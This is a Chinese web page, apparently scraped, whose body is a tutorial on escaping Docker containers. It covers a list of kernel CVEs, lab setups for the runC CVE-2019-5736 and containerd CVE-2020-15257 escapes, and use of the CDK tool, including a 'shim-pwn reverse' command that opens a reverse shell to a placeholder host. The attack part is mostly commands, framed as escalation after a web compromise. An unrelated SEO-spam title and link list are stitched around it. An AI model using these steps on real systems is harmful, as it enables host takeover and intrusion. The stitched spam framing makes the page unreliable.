当前位置: 首页 > news >正文

吉安建设公司网站dede 汽车网站

news 2025/11/7 11:08:01
吉安建设公司网站,dede 汽车网站,成都网站开发等项目外包公司,营销推广的工作内容文章目录 云原生-Docker安全-容器逃逸&内核漏洞云原生-Docker安全-容器逃逸&版本漏洞-CVE-2019-5736 runC容器逃逸-CVE-2020-15257 containerd逃逸 云原生-Docker安全-容器逃逸&CDK自动化 云原生-Docker安全-容器逃逸&内核漏洞 细节部分在权限提升章节会详解&…

文章目录

  • 云原生-Docker安全-容器逃逸&内核漏洞
  • 云原生-Docker安全-容器逃逸&版本漏洞
    • -CVE-2019-5736 runC容器逃逸
    • -CVE-2020-15257 containerd逃逸
  • 云原生-Docker安全-容器逃逸&CDK自动化

云原生-Docker安全-容器逃逸&内核漏洞

细节部分在权限提升章节会详解,常用:
CVE-2016-5195 CVE-2019-16884 CVE-2021-3493
CVE-2021-22555 CVE-2022-0492 CVE-2022-0847 CVE-2022-23222

云原生-Docker安全-容器逃逸&版本漏洞

-CVE-2019-5736 runC容器逃逸

Docker version <= 18.09.2
RunC version <= 1.0-rc6

1、安装docker对应版本

apt-get update
apt-get install -y apt-transport-https ca-certificates curl software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable"
apt-get update
apt-cache madison docker-ce
apt-get install docker-ce=18.06.1~ce~3-0~ubuntu

在这里插入图片描述2、启动环境测试:

docker run -itd --cap-add=SYS_ADMIN ubuntu:latest

3、编译修改后EXP后等待管理进入执行
https://github.com/Frichetten/CVE-2019-5736-PoC
在这里插入图片描述

CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go

在这里插入图片描述

docker cp main 7f4793f3ac0cd13:/
docker exec -it 7f4793f3ac0cd13 /bin/bash

在这里插入图片描述还有一个条件就是执行main文件后需要管理员进入该容器进行触发
在这里插入图片描述4、实验获取到docker搭建的Web权限后进行逃逸

docker run -it -p 8888:8080 vulhub/struts2:s2-053

-CVE-2020-15257 containerd逃逸

containerd < 1.4.3
containerd < 1.3.9

1、安装docker对应版本

apt-get update
apt-get install ca-certificates curl software-properties-common
curl -fsSL https://download.docker.com/linux/ubuntu/gpg | apt-key add -
add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu xenial stable"
apt-get update
apt-cache madison docker-ce
apt-get install docker-ce=5:19.03.6~3-0~ubuntu-xenial docker-ce-cli=5:19.03.6~3-0~ubuntu-xenial containerd.io=1.2.4-1

2、启动环境测试:

docker pull ubuntu:18.04
docker run -itd --net=host ubuntu:18.04 /bin/bash
docker exec -it 5be3ed60f152 /bin/bash

3、上传CDK自动提权反弹

docker cp cdk_linux_amd64 8e7c27d7b98ca32927:/tmp
chmod 777 cdk_linux_amd64
./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx xxxx

在这里插入图片描述4、实验获取到docker搭建的Web权限后进行逃逸

docker run -it -p 8888:8080 vulhub/struts2:s2-053

云原生-Docker安全-容器逃逸&CDK自动化

检测利用:https://github.com/cdk-team/CDK
在这里插入图片描述信息收集-漏洞探测

./cdk_linux_amd64 evaluate

在这里插入图片描述在这里插入图片描述指定漏洞逃逸

./cdk_linux_amd64 run shim-pwn reverse xx.xx.xx.xx xxxx

常规检测:https://github.com/teamssix/container-escape-check
实现:信息收集,指定逃逸,自动逃逸,修复功能等

http://www.yayakq.cn/news/520686/

相关文章:

  • 做淘宝客的网站路由器做网站服务器
  • 什么样的网站不备案网络营销推广案例分析
  • 提高网站百度权重免费制作简历模板网站
  • 课程网站建设调研报告网站建设定制开发价格
  • 杭州网站建设 网站设计校园网站建设年度总结
  • 做网站都需要用到什么产品做网站如何谁来维护价格
  • 大学生做网站和做app网站后台上传图片显示运行错误为什么
  • 网站的要素是什么啥也不懂怎么建设网站
  • 百度推广 网站吸引力微信小程序开发用什么工具
  • 网站开发人员属于什么软件wordpress 雪人主题
  • 做网站需要登录什么软件广东省住房建设部网站
  • 网站开发了解客户需求奇璐荣获北京十大高端设计公司称号
  • 网站网格布局产品关键词大全
  • 我要学网站建设怎么做淘宝客优惠劵网站
  • 可信网站 如何验证后端开发培训机构
  • 怎样用虚拟主机建网站如何关闭网站 备案
  • 做家簇图像网站自主建网站
  • 江门网站推广哪家好wordpress门户网站模板
  • 上海网站建设公司指南安卓手机网站源码下载
  • 网站还没有建好可以备案吗企业网站推广优化公司
  • 银川做网站哪家好企业建设网站有什么好处
  • 智慧团建管理员登录入口广西seo
  • 制作网站报价单wordpress在哪登陆
  • 网站建设都需要什么资料桃城网站建设
  • 曲阜做网站如何免费开网店
  • 安卓优化清理大师网站过度优化首页被k
  • 珠海建设改革有哪些网站零基础可以做网站吗
  • 专业网站建设价格大全弹幕怎么做视频网站
  • 网站建设云创深圳做h5网站公司
  • 好的网站具备什么条件网站前台和后台对接